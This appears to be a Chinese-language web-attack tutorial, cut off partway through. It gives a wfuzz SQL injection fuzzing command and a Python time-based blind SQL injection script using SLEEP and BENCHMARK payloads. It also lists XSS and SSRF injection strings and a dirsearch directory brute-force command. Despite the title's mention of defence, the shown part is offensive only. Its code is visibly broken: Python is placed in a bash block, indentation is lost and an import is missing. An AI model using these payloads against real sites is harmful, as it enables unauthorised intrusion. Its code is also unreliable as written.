# 漏洞挖掘与利用技术全解:攻击链深度剖析与防御实践
## 一、模糊测试技术攻防体系
### 1.1 参数变异攻击实战
**代码实现:**
```bash
# wfuzz基础爆破模板
wfuzz -w /usr/share/wordlists/sqli.txt -d "id=FUZZ&page=1" -H "Cookie: PHPSESSID=abc123" http://target.com/search
# SQL时间盲注检测脚本
import requests
payloads = ["' AND SLEEP(5)--", "' OR BENCHMARK(5000000,MD5('test'))--"]
for p in payloads:
start = time.time()
r = requests.post(url, data={"user":p})
if time.time() - start > 4:
print(f"漏洞存在! Payload: {p}")
```
**技术解析:**
- 异常参数注入检测:通过植入三类特征字符集
- SQL注入:`'";--`、`OR 1=1`、`BENCHMARK()`
- XSS:`<img src=x οnerrοr=alert(1)>`
- SSRF:`metadata`地址和内部IP段
- 响应差异分析方法:
- 时间延迟检测(>4秒判为漏洞)
- HTTP状态码模式分析(500错误与正常响应对比)
- 内容相似度计算(使用difflib库进行差异比对)
### 1.2 路径爆破深度实践
**工具链配置:**
```python
# Dirsearch高级配置模板
dirsearch -u http://target.com -e php,aspx -X 403,404 -t 50 --random-agents --recursive=3
# 自定义API路径生成器
import itertools
base = ["/api/","/v1/","/internal/"]
paths = ["admin","debug","backup"]
for b,p in itertools.product(base, paths):
print(b+p)
```
**实战要点:**<